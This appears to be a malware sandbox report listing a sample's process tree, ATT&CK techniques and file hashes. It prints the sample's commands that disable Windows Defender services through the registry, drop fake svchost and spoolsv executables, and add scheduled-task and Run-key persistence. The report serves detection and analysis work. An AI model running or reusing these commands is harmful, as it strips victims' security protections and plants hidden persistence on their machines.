C:\Windows\system32\reg.exereg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f4⤵PID:2164
-
-
C:\Windows\system32\reg.exereg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f4⤵PID:2292
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f4⤵
- Modifies Security services
PID:1740
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f4⤵
- Modifies Security services
PID:1548
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f4⤵
- Modifies Security services
PID:1260
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f4⤵
- Modifies Security services
PID:1992
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f4⤵
- Modifies security service
PID:808
-
-
-
-
C:\Windows\Resources\Themes\icsys.icn.exeC:\Windows\Resources\Themes\icsys.icn.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2936 -
\??\c:\windows\resources\themes\explorer.exec:\windows\resources\themes\explorer.exe3⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Drops file in System32 directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2916 -
\??\c:\windows\resources\spoolsv.exec:\windows\resources\spoolsv.exe SE4⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2748 -
\??\c:\windows\resources\svchost.exec:\windows\resources\svchost.exe5⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2520 -
\??\c:\windows\resources\spoolsv.exec:\windows\resources\spoolsv.exe PR6⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2504
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "svchost" /tr "c:\windows\resources\svchost.exe" /sc daily /st 19:35 /f6⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
- Suspicious use of AdjustPrivilegeToken
PID:1804
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "svchost" /tr "c:\windows\resources\svchost.exe" /sc daily /st 19:36 /f6⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
- Suspicious use of AdjustPrivilegeToken
PID:3064
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "svchost" /tr "c:\windows\resources\svchost.exe" /sc daily /st 19:37 /f6⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
- Suspicious use of AdjustPrivilegeToken
PID:2100
-
-
-
-
C:\Windows\Explorer.exeC:\Windows\Explorer.exe4⤵PID:2264
-
-
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
3Windows Service
3Event Triggered Execution
2AppInit DLLs
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
3Windows Service
3Event Triggered Execution
2AppInit DLLs
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Hide Artifacts
1Hidden Files and Directories
1Impair Defenses
3Disable or Modify System Firewall
1Disable or Modify Tools
1Modify Registry
5Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
4KB
MD5c9a8191ee366721dc76c094d31d507d1
SHA1396eb8e788fc82491b997b264b61a81ce6614b5a
SHA256d8622f7694a69be3f25b7e4f012cb56a2e4b6c1c358a9538ea54ea646a434a2b
SHA512eaa7e41b28891f88e6eccd108b7990642c0705c4ab9b1289778df693b8e33b31f728840d2d53397463849e3d7900e83b1a1aac26fd654e12a727a05472ff75bc
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5174aaf9950eba3e9fe9de2c0997143e2
SHA1b9bd50b4deeba20f19ce9cf78741ef06af1f019b
SHA2568a5e583854358dafcf515d8d3643b23078aab0cdf85cd936e96e366b686adf9e
SHA512e44a1eafc55e9d05a780b6a0a1784332a0783ceb5d813e4dc83ee78b0cd44196d92348528deeb8d97d840efbc4f8168f04e3e3ef04be67ae336486bc9592bc9e
-
Filesize
135KB
MD5829bbe6384ff7889f525b2b6325b334c
SHA182af522616939f92ad58f08d1558984ab711bc5f
SHA256a884ce48da334d33b220b05cdbf7613dfabb100af2126ac9b2fa268de70d238e
SHA5125aa7660306c50811d17715af9c0f5fa312c69abed2228546f15b224756d8a1377f4e978d1eec994ae3184bfd578d87c2aae20d9d5b6b17535851b7453af0940e
-
Filesize
135KB
MD5809b156135c25258ad413ff6c2605f55
SHA162563abc9aa087013fca7aff5d7068f3335d5c26
SHA25693b6be77688a21d8e6e9122d304b9e048dc615724b76825f4be38d962b53239b
SHA5124a8f89e7fa88934f6336453a50b62809d60957419c2dfbe6f42b89a5322417da77387f4815724a4d88ca1433b6c8862fe13cc57683d5ef7cc6f3e3fd320bce1c
-
Filesize
135KB
MD59091fdeacc906e4571e7d751436480b1
SHA12a93b809e77fe006fdfda865a95509ee2d62bd10
SHA256747236cc3136853a84242c66acfb36f6495b6877f7616b1785e646f1d6701433
SHA5120a60db0cfc8e4bbf1701539390603cbd5492dc3dc8fc6945a3eb89fa5063b5c527bbd27daa5fb7bcbdf6c86f42f71bb4f5975dfbc4360198948aa7fba63f18b2
-
Filesize
67KB
MD57574cf2c64f35161ab1292e2f532aabf
SHA114ba3fa927a06224dfe587014299e834def4644f
SHA256de055a89de246e629a8694bde18af2b1605e4b9b493c7e4aef669dd67acf5085
SHA5124db19f2d8d5bc1c7bbb812d3fa9c43b80fa22140b346d2760f090b73aed8a5177edb4bddc647a6ebd5a2db8565be5a1a36a602b0d759e38540d9a584ba5896ab
-
\Users\Admin\AppData\Local\Temp\09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba.exe
Filesize177KB
MD52898552d3a7845982c161116ad933d27
SHA102cc92d5df84b88648f6b7b69ac6c1aff574bef0
SHA2566e8c04f038f91e03bd97ce704a5c8c3da19836ea984fec10708c99e0a1a71f26
SHA512ca90a7396b4f0c582ef79f52c0c7a3de1fb53798291eda771f77f9b7bb36615e30d7d2443e34aa3b95b5529a645325adefff9f796fea421791e38a0e37f1851f
-
Filesize
135KB
MD52acee5d6d011dbc4f83f5194a25e7a93
SHA10710f931a6c79fa67eb1d50d3f105bae1d26f0d1
SHA2564fab4f218fbe62231f864cdd169374cbf02e494cd3dfd0b147941d05bb257714
SHA512e078135c1844d90141f193bbf7d36563ffa49516f44e994eb979f27b1c03826b16392c3604e76c2e5b99338c2216469ce05097021695d990b5b8aa265afc12f4